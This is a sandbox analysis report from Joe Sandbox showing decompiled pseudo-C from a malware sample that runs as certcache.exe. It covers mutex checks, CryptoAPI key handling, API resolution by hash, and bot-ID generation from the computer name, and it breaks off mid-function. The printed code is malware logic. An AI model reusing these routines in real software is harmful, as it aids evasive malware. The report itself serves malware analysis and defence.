Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A992A, Relevance: 5.0, APIs: 4, Instructions: 17

APIs

GetProcessHeap.KERNEL32 ref: 001A992A
HeapFree.KERNEL32(00000000), ref: 001A9931
GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 001A994A
HeapFree.KERNEL32(00000000), ref: 001A9951

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Analysis Process: certcache.exe PID: 2280 Parent PID: 2072

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12%
Total number of Nodes:	542
Total number of Limit Nodes:	29

Executed Functions

Function 001391F0, Relevance: 21.1, APIs: 14, Instructions: 64
encryptiontime

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E001391F0(signed int __ecx) {
				void* _t3;
				long _t12;
				long _t19;
				int _t21;
				signed int _t23;
				void* _t25;
				void* _t28;

				_t23 = __ecx;
				_t3 = CreateEventW(??, ??, ??, ??);
				 *0x13c29c = _t3;
				if(_t3 != 0) {
					_t19 = SignalObjectAndWait(_t3,  *0x13c2a0, 0xffffffff, 0);
					if(_t19 == 0 || _t19 == 0x80) {
						_t21 = ResetEvent( *0x13c29c);
					}
				}
				ReleaseMutex(_t25);
				CloseHandle(_t25);
				if(_t21 != 0) {
					_t12 = GetTickCount(); // executed
					_push(0x10);
					_push(0x3e8);
					_push(0x1388);
					_push(0);
					 *0x13c280 = 1;
					_push(E00138E20);
					 *0x13c278 = _t12 + 0x1388;
					_push(0);
					_push(_t28 - 8);
					if( *0x13c188() != 0) {
						WaitForSingleObject( *0x13c29c, 0xffffffff);
						 *0x13c11c(0,  *((intOrPtr*)(_t28 - 8)), 0xffffffff);
					}
					CloseHandle( *0x13c29c);
				}
				 *0x13c048( *0x13c288);
				CryptDestroyKey( *0x13c28c);
				CryptDestroyKey( *0x13c290);
				CryptReleaseContext( *0x13c284, 0);
				E00138AE0(_t21);
				return E0013A7A0(_t23 | 0xffffffff);
			}

0x001391f0
0x001391f0
0x001391f6
0x001391fd
0x0013920a
0x00139212
0x00139227
0x00139227
0x00139212
0x0013922a
0x00139231
0x00139239
0x0013923b
0x00139241
0x00139243
0x00139248
0x0013924d
0x00139254
0x0013925e
0x00139263
0x0013926b
0x0013926d
0x00139276
0x00139280
0x0013928d
0x0013928d
0x00139299
0x00139299
0x001392a5
0x001392b1
0x001392bd
0x001392cb
0x001392d1
0x001392e4

APIs

CreateEventW.KERNEL32 ref: 001391F0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 0013920A
ResetEvent.KERNEL32 ref: 00139221
ReleaseMutex.KERNEL32 ref: 0013922A
CloseHandle.KERNEL32 ref: 00139231
GetTickCount.KERNEL32 ref: 0013923B
CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 0013926E
WaitForSingleObject.KERNEL32(000000FF), ref: 00139280
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0013928D
CloseHandle.KERNEL32 ref: 00139299
CryptDestroyHash.ADVAPI32 ref: 001392A5
CryptDestroyKey.ADVAPI32 ref: 001392B1
CryptDestroyKey.ADVAPI32 ref: 001392BD
CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB

Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013914E, Relevance: 16.6, APIs: 11, Instructions: 62
encryption

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E0013914E(void* __ecx, void* __edx, void* __eflags) {
				void* _t21;
				void* _t28;
				long _t31;
				long _t38;
				int _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t52;

				asm("lahf");
				asm("int3");
				L00131830(__ecx, __edx);
				_t49 =  *(_t52 - 4);
				 *0x13c20c(_t52 - 0x188, 0x40, _t49,  *0x13c27c);
				HeapFree(GetProcessHeap(), 0, _t49);
				L00131830(0x131264, 0xc);
				_t50 =  *(_t52 - 4);
				 *0x13c20c(_t52 - 0x108, 0x40, _t50,  *0x13c27c, 0x4b85ca91, _t52 - 4);
				HeapFree(GetProcessHeap(), 0, _t50);
				_t21 = CreateMutexW(0, 0, _t52 - 0x108); // executed
				 *0x13c2a0 = _t21;
				if(_t21 != 0) {
					goto 0x141924;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t28 = CreateEventW();
					 *0x13c29c = _t28;
					if(_t28 != 0) {
						_t38 = SignalObjectAndWait(_t28,  *0x13c2a0, 0xffffffff, 0);
						if(_t38 == 0 || _t38 == 0x80) {
							_t40 = ResetEvent( *0x13c29c);
						}
					}
					ReleaseMutex(_t47);
					CloseHandle(_t47);
					if(_t40 != 0) {
						_t31 = GetTickCount(); // executed
						_push(0x10);
						_push(0x3e8);
						_push(0x1388);
						_push(0);
						 *0x13c280 = 1;
						_push(E00138E20);
						 *0x13c278 = _t31 + 0x1388;
						_push(0);
						_push(_t52 - 8);
						if( *0x13c188() != 0) {
							WaitForSingleObject( *0x13c29c, 0xffffffff);
							 *0x13c11c(0,  *((intOrPtr*)(_t52 - 8)), 0xffffffff);
						}
						CloseHandle( *0x13c29c);
					}
				}
				 *0x13c048( *0x13c288);
				CryptDestroyKey( *0x13c28c);
				CryptDestroyKey( *0x13c290);
				CryptReleaseContext( *0x13c284, 0);
				E00138AE0(_t40);
				return E0013A7A0(0xffffffffffffffff);
			}

0x0013914e
0x0013914f
0x00139150
0x0013915b
0x00139168
0x0013917b
0x00139194
0x0013919f
0x001391ac
0x001391bf
0x001391d0
0x001391d6
0x001391dd
0x001391e3
0x001391e8
0x001391e9
0x001391ea
0x001391eb
0x001391ec
0x001391ed
0x001391ee
0x001391ef
0x001391f0
0x001391f6
0x001391fd
0x0013920a
0x00139212
0x00139227
0x00139227
0x00139212
0x0013922a
0x00139231
0x00139239
0x0013923b
0x00139241
0x00139243
0x00139248
0x0013924d
0x00139254
0x0013925e
0x00139263
0x0013926b
0x0013926d
0x00139276
0x00139280
0x0013928d
0x0013928d
0x00139299
0x00139299
0x00139239
0x001392a5
0x001392b1
0x001392bd
0x001392cb
0x001392d1
0x001392e4

APIs

_snwprintf.NTDLL ref: 00139168
GetProcessHeap.KERNEL32(00000000,?), ref: 00139174
HeapFree.KERNEL32(00000000), ref: 0013917B
_snwprintf.NTDLL ref: 001391AC
GetProcessHeap.KERNEL32(00000000,?), ref: 001391B8
HeapFree.KERNEL32(00000000), ref: 001391BF
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 001391D0
CryptDestroyHash.ADVAPI32 ref: 001392A5
CryptDestroyKey.ADVAPI32 ref: 001392B1
CryptDestroyKey.ADVAPI32 ref: 001392BD
CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB

Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001390BE, Relevance: 15.1, APIs: 10, Instructions: 57
encryption

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E001390BE(void* __eflags) {
				void* _t22;
				long _t29;
				void* _t42;
				void* _t43;
				long _t46;
				long _t53;
				int _t55;
				signed int _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				_t55 = 0;
				memset(0x13c284, 0, ??);
				_t57 = 0x131364;
				_t2 = _t55 + 0xc; // 0xc
				_t59 = _t2;
				L00131830(0x131364, _t2);
				_t63 =  *(_t67 - 4);
				 *0x13c20c(_t67 - 0x88, 0x40, _t63,  *0x13c27c, 0x4b85ca91, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t22 = CreateMutexW(0, 0, _t67 - 0x88); // executed
				_t61 = _t22;
				if(_t61 != 0) {
					_t29 = WaitForSingleObject(_t61, 0);
					if(_t29 == 0 || _t29 == 0x80) {
						goto 0x141903;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("lahf");
						asm("int3");
						L00131830(_t57, _t59);
						_t65 =  *(_t67 - 4);
						 *0x13c20c(_t67 - 0x188, 0x40, _t65,  *0x13c27c);
						HeapFree(GetProcessHeap(), 0, _t65);
						_t57 = 0x131264;
						L00131830(0x131264, 0xc);
						_t66 =  *(_t67 - 4);
						 *0x13c20c(_t67 - 0x108, 0x40, _t66,  *0x13c27c, 0x4b85ca91, _t67 - 4);
						HeapFree(GetProcessHeap(), 0, _t66);
						_t42 = CreateMutexW(0, 0, _t67 - 0x108); // executed
						 *0x13c2a0 = _t42;
						if(_t42 != 0) {
							goto 0x141924;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t43 = CreateEventW();
							 *0x13c29c = _t43;
							if(_t43 != 0) {
								_t53 = SignalObjectAndWait(_t43,  *0x13c2a0, 0xffffffff, 0);
								if(_t53 == 0 || _t53 == 0x80) {
									_t55 = ResetEvent( *0x13c29c);
								}
							}
							ReleaseMutex(_t61);
							CloseHandle(_t61);
							if(_t55 != 0) {
								_t46 = GetTickCount(); // executed
								_push(0x10);
								_push(0x3e8);
								_push(0x1388);
								_push(0);
								 *0x13c280 = 1;
								_push(E00138E20);
								 *0x13c278 = _t46 + 0x1388;
								_push(0);
								_push(_t67 - 8);
								if( *0x13c188() != 0) {
									WaitForSingleObject( *0x13c29c, 0xffffffff);
									 *0x13c11c(0,  *((intOrPtr*)(_t67 - 8)), 0xffffffff);
								}
								CloseHandle( *0x13c29c);
							}
						}
					}
				}
				 *0x13c048( *0x13c288);
				CryptDestroyKey( *0x13c28c);
				CryptDestroyKey( *0x13c290);
				CryptReleaseContext( *0x13c284, 0);
				E00138AE0(_t55);
				return E0013A7A0(_t57 | 0xffffffff);
			}

0x001390be
0x001390c6
0x001390cf
0x001390da
0x001390da
0x001390dd
0x001390e8
0x001390f5
0x00139107
0x00139116
0x0013911c
0x00139120
0x00139128
0x00139130
0x0013913d
0x00139142
0x00139143
0x00139144
0x00139145
0x00139146
0x00139147
0x00139148
0x00139149
0x0013914a
0x0013914b
0x0013914c
0x0013914d
0x0013914e
0x0013914f
0x00139150
0x0013915b
0x00139168
0x0013917b
0x0013918f
0x00139194
0x0013919f
0x001391ac
0x001391bf
0x001391d0
0x001391d6
0x001391dd
0x001391e3
0x001391e8
0x001391e9
0x001391ea
0x001391eb
0x001391ec
0x001391ed
0x001391ee
0x001391ef
0x001391f0
0x001391f6
0x001391fd
0x0013920a
0x00139212
0x00139227
0x00139227
0x00139212
0x0013922a
0x00139231
0x00139239
0x0013923b
0x00139241
0x00139243
0x00139248
0x0013924d
0x00139254
0x0013925e
0x00139263
0x0013926b
0x0013926d
0x00139276
0x00139280
0x0013928d
0x0013928d
0x00139299
0x00139299
0x00139239
0x001391dd
0x00139130
0x001392a5
0x001392b1
0x001392bd
0x001392cb
0x001392d1
0x001392e4

APIs

memset.NTDLL ref: 001390C6
_snwprintf.NTDLL ref: 001390F5
GetProcessHeap.KERNEL32(00000000,?), ref: 00139100
HeapFree.KERNEL32(00000000), ref: 00139107
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00139116
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00139128
CryptDestroyHash.ADVAPI32 ref: 001392A5
CryptDestroyKey.ADVAPI32 ref: 001392B1
CryptDestroyKey.ADVAPI32 ref: 001392BD
CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB

Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00132447, Relevance: 12.1, APIs: 8, Instructions: 58
encryption

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?), ref: 00132452
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00132459
CryptDuplicateHash.ADVAPI32(?,?,?,?,?), ref: 0013247E
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00132497
CryptEncrypt.ADVAPI32(?,00000001,?,?,?), ref: 001324B4
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
HeapFree.KERNEL32(00000000), ref: 00132541

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001324C8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
encryption

C-Code - Quality: 25%

			E001324C8(void* __eax, void* __ebx, void* __edi) {
				void* _t13;
				void* _t19;
				intOrPtr* _t24;
				void* _t28;
				void** _t29;
				void* _t31;

				_t26 = __edi;
				 *((intOrPtr*)(_t31 - 0x14)) = 0x6c;
				_t28 = __ebx;
				_t13 =  *0x13c054( *0x13c28c,  *0x13c288, 1, 0x40, __eax); // executed
				if(_t13 != 0) {
					_t24 = _t31 - 0x15;
					do {
						_t28 = _t28 + 1;
						 *((char*)(_t28 - 1)) =  *_t24;
						_t24 = _t24 - 1;
						_t19 = _t31 - 0x74;
					} while (_t24 >= _t19);
					 *((intOrPtr*)(_t31 - 0x14)) = 0x14;
					 *0x13c068( *((intOrPtr*)(_t31 - 4)), 2, __ebx + 0x60, _t19);
					_t26 =  !=  ? 1 : __edi;
				}
				_t29 =  *(_t31 + 8);
				 *0x13c048( *((intOrPtr*)(_t31 - 4)));
				if(_t26 == 0) {
					HeapFree(GetProcessHeap(), 0,  *_t29);
					 *_t29 = 0;
					_t29[1] = 0;
				}
				return _t26;
			}

0x001324c8
0x001324c8
0x001324da
0x001324e2
0x001324ea
0x001324ec
0x001324f0
0x001324f2
0x001324f5
0x001324f8
0x001324f9
0x001324fc
0x00132505
0x00132516
0x00132523
0x00132523
0x00132526
0x0013252c
0x00132534
0x00132541
0x00132547
0x0013254d
0x0013254d
0x0013255c

APIs

CryptExportKey.ADVAPI32(00000001,00000040), ref: 001324E2
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
HeapFree.KERNEL32(00000000), ref: 00132541

Strings

l, xrefs: 001324C8

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139CB6, Relevance: 36.2, APIs: 24, Instructions: 178
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E00139CB6(void* __ecx, void* __edx, void* __edi) {
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t35;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t59;
				void* _t63;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t96 = __edi;
				asm("lahf");
				asm("int3");
				L00131830(__ecx, __edx);
				_t97 =  *(_t106 - 4);
				_t17 = LoadLibraryW(_t97);
				_push(0x13c040);
				_push(0x30116feb);
				_push(0x21);
				L00131B10(_t17, 0x131040, _t96, _t97);
				HeapFree(GetProcessHeap(), 0, _t97);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131568, 0xc);
				_t98 =  *(_t106 - 4);
				_t23 = LoadLibraryW(_t98);
				_push(0x13c0c8);
				_push(0x1f598772);
				_push(1);
				L00131B10(_t23, 0x131024, _t96, _t98);
				HeapFree(GetProcessHeap(), 0, _t98);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131574, 0xc);
				_t99 =  *(_t106 - 4);
				_t29 = LoadLibraryW(_t99);
				_push(0x13c214);
				_push(0x41696925);
				_push(2);
				L00131B10(_t29, 0x131028, _t96, _t99);
				HeapFree(GetProcessHeap(), 0, _t99);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131580, 0xc);
				_t100 =  *(_t106 - 4);
				_t35 = LoadLibraryW(_t100); // executed
				_push(0x13c0c4);
				_push(0x37dff52a);
				_push(1);
				L00131B10(_t35, 0x13100c, _t96, _t100);
				HeapFree(GetProcessHeap(), 0, _t100);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131550, 0xc);
				_t101 =  *(_t106 - 4);
				_t41 = LoadLibraryW(_t101); // executed
				_push(0x13c0cc);
				_push(0x14c87d5f);
				_push(1);
				L00131B10(_t41, 0x1310c4, _t96, _t101);
				HeapFree(GetProcessHeap(), 0, _t101);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131544, 0xc);
				_t102 =  *(_t106 - 4);
				_t47 = LoadLibraryW(_t102); // executed
				_push(0x13c21c);
				_push(0x786d5b64);
				_push(2);
				L00131B10(_t47, 0x1310c8, _t96, _t102);
				HeapFree(GetProcessHeap(), 0, _t102);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x131598, 0xc);
				_t103 =  *(_t106 - 4);
				_t53 = LoadLibraryW(_t103);
				_push(0x13c230);
				_push(0x53973344);
				_push(0xe);
				L00131B10(_t53, 0x131220, _t96, _t103);
				HeapFree(GetProcessHeap(), 0, _t103);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00131830(0x13158c, 0xc);
				_t104 =  *(_t106 - 4);
				_t59 = LoadLibraryW(_t104); // executed
				_push(0x13c224);
				_push(0x221bf2d2);
				_push(3);
				L00131B10(_t59, 0x131214, _t96, _t104);
				HeapFree(GetProcessHeap(), 0, _t104); // executed
				_t63 = L001392F0(_t59); // executed
				return _t63;
			}

0x00139cb6
0x00139cb6
0x00139cb7
0x00139cb8
0x00139cbd
0x00139cc4
0x00139cca
0x00139ccf
0x00139cd4
0x00139cdd
0x00139cef
0x00139cfd
0x00139cfe
0x00139d08
0x00139d0d
0x00139d14
0x00139d1a
0x00139d1f
0x00139d24
0x00139d2d
0x00139d3f
0x00139d4d
0x00139d4e
0x00139d58
0x00139d5d
0x00139d64
0x00139d6a
0x00139d6f
0x00139d74
0x00139d7d
0x00139d8f
0x00139d9d
0x00139d9e
0x00139da8
0x00139dad
0x00139db4
0x00139dba
0x00139dbf
0x00139dc4
0x00139dcd
0x00139ddf
0x00139ded
0x00139dee
0x00139df8
0x00139dfd
0x00139e04
0x00139e0a
0x00139e0f
0x00139e14
0x00139e1d
0x00139e2f
0x00139e3d
0x00139e3e
0x00139e48
0x00139e4d
0x00139e54
0x00139e5a
0x00139e5f
0x00139e64
0x00139e6d
0x00139e7f
0x00139e8d
0x00139e8e
0x00139e98
0x00139e9d
0x00139ea4
0x00139eaa
0x00139eaf
0x00139eb4
0x00139ebd
0x00139ecf
0x00139edd
0x00139ede
0x00139ee8
0x00139ef0
0x00139ef4
0x00139efa
0x00139eff
0x00139f04
0x00139f0d
0x00139f1f
0x00139f25
0x00139f2e

APIs

LoadLibraryW.KERNEL32(?), ref: 00139CC4
GetProcessHeap.KERNEL32(00000000,?), ref: 00139CE8
HeapFree.KERNEL32(00000000), ref: 00139CEF
LoadLibraryW.KERNEL32(?), ref: 00139D14
GetProcessHeap.KERNEL32(00000000,?), ref: 00139D38
HeapFree.KERNEL32(00000000), ref: 00139D3F
LoadLibraryW.KERNEL32(?), ref: 00139D64
GetProcessHeap.KERNEL32(00000000,?), ref: 00139D88
HeapFree.KERNEL32(00000000), ref: 00139D8F
LoadLibraryW.KERNEL32(?), ref: 00139DB4
GetProcessHeap.KERNEL32(00000000,?), ref: 00139DD8
HeapFree.KERNEL32(00000000), ref: 00139DDF
LoadLibraryW.KERNEL32(?), ref: 00139E04
GetProcessHeap.KERNEL32(00000000,?), ref: 00139E28
HeapFree.KERNEL32(00000000), ref: 00139E2F
LoadLibraryW.KERNEL32(?), ref: 00139E54
GetProcessHeap.KERNEL32(00000000,?), ref: 00139E78
HeapFree.KERNEL32(00000000), ref: 00139E7F
LoadLibraryW.KERNEL32(?), ref: 00139EA4
GetProcessHeap.KERNEL32(00000000,?), ref: 00139EC8
HeapFree.KERNEL32(00000000), ref: 00139ECF
LoadLibraryW.KERNEL32(?), ref: 00139EF4
GetProcessHeap.KERNEL32(00000000,?), ref: 00139F18
HeapFree.KERNEL32(00000000), ref: 00139F1F

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001394C1, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 76

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E001394C1(void* __ecx, signed short __edx, void* __eflags) {
				void* _t17;
				int _t20;
				signed int _t27;
				void* _t28;
				void* _t30;
				void* _t36;
				signed short* _t38;
				signed short _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t39 = __edx;
				L00131830(__ecx, __edx);
				_t41 =  *(_t45 - 4);
				 *0x13c20c("C:\Windows\SysWOW64", 0x104, _t41, "C:\Windows\SysWOW64", "certcache");
				HeapFree(GetProcessHeap(), 0, _t41);
				_t42 =  *(_t45 - 8);
				 *0x13c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t42, "C:\Windows\SysWOW64", "certcache");
				_t48 = _t46 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t42);
				_t17 = CreateFileW("C:\Windows\SysWOW64\certcache.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t43 = _t17;
				if(_t43 != 0xffffffff) {
					goto 0x1419c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t28 = CreateFileMappingW(); // executed
					_t40 = _t28;
					if(_t40 != 0) {
						goto 0x1419d9;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3"); // executed
						_t30 = MapViewOfFile(); // executed
						_t36 = _t30;
						if(_t36 != 0) {
							 *0x13cbd0 = RtlComputeCrc32(0, _t36, GetFileSize(_t43, 0));
							UnmapViewOfFile(_t36);
						}
						CloseHandle(_t40);
					}
					CloseHandle(_t43);
				}
				 *(_t45 - 8) = 0x10;
				_t20 = GetComputerNameW(_t45 - 0x28, _t45 - 8); // executed
				if(_t20 != 0) {
					_t38 = _t45 - 0x28;
					if( *(_t45 - 0x28) != 0) {
						goto 0x1419f0;
						asm("int3");
						do {
							_t27 =  *_t38 & 0x0000ffff;
							if(_t27 < 0x30 || _t27 > 0x39) {
								if(_t27 < 0x61 || _t27 > 0x7a) {
									if(_t27 < 0x41 || _t27 > 0x5a) {
										 *_t38 = _t39;
									}
								}
							}
							_t38 =  &(_t38[1]);
						} while ( *_t38 != 0);
					}
					_t44 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t44 == 0) {
						_t44 =  *(_t45 - 8);
					} else {
						goto 0x141a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("lahf");
						asm("int3");
						E00131790(_t38, _t39);
						_t48 = _t48 + 8;
					}
					 *0x13c1f8("216554_6C0D37D2", 0x104, _t44, _t45 - 0x28,  *0x13c3ac);
					_t20 = HeapFree(GetProcessHeap(), 0, _t44);
				}
				goto 0x141a1e;
				return _t20;
			}

0x001394c1
0x001394c1
0x001394c6
0x001394de
0x001394f1
0x001394f7
0x0013950f
0x00139515
0x00139522
0x0013953c
0x00139542
0x00139547
0x00139549
0x0013954e
0x0013954f
0x00139550
0x00139551
0x00139552
0x00139553
0x00139554
0x0013955a
0x0013955e
0x00139560
0x00139565
0x00139566
0x00139567
0x00139568
0x00139569
0x0013956f
0x00139573
0x00139589
0x0013958e
0x0013958e
0x00139595
0x00139595
0x0013959c
0x0013959c
0x001395a5
0x001395b1
0x001395ba
0x001395c5
0x001395c8
0x001395ca
0x001395cf
0x001395d0
0x001395d0
0x001395d6
0x001395e0
0x001395ea
0x001395f1
0x001395f1
0x001395ea
0x001395e0
0x001395f4
0x001395f7
0x001395d0
0x0013960e
0x00139612
0x0013962a
0x00139614
0x00139614
0x00139619
0x0013961a
0x0013961b
0x0013961c
0x0013961d
0x0013961e
0x0013961f
0x00139620
0x00139625
0x00139625
0x00139642
0x00139655
0x00139655
0x0013965b
0x00139660

APIs

_snwprintf.NTDLL ref: 001394DE
GetProcessHeap.KERNEL32(00000000,?), ref: 001394EA
HeapFree.KERNEL32(00000000), ref: 001394F1
_snwprintf.NTDLL ref: 0013950F
GetProcessHeap.KERNEL32(00000000,?), ref: 0013951B
HeapFree.KERNEL32(00000000), ref: 00139522
CreateFileW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0013953C
GetComputerNameW.KERNEL32(?,?), ref: 001395B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
RtlAllocateHeap.NTDLL(00000000), ref: 00139608
_snprintf.NTDLL ref: 00139642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
HeapFree.KERNEL32(00000000), ref: 00139655

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 0013950A
216554_6C0D37D2, xrefs: 0013963D
C:\Windows\SysWOW64\certcache.exe, xrefs: 00139537
certcache, xrefs: 001394C9, 001394FA
C:\Windows\SysWOW64, xrefs: 001394CE, 001394D9, 001394FF

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138E20, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 155
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00138E20(void* __ebx, void* __edx, void* __edi) {
				void* _v16;
				void* _v24;
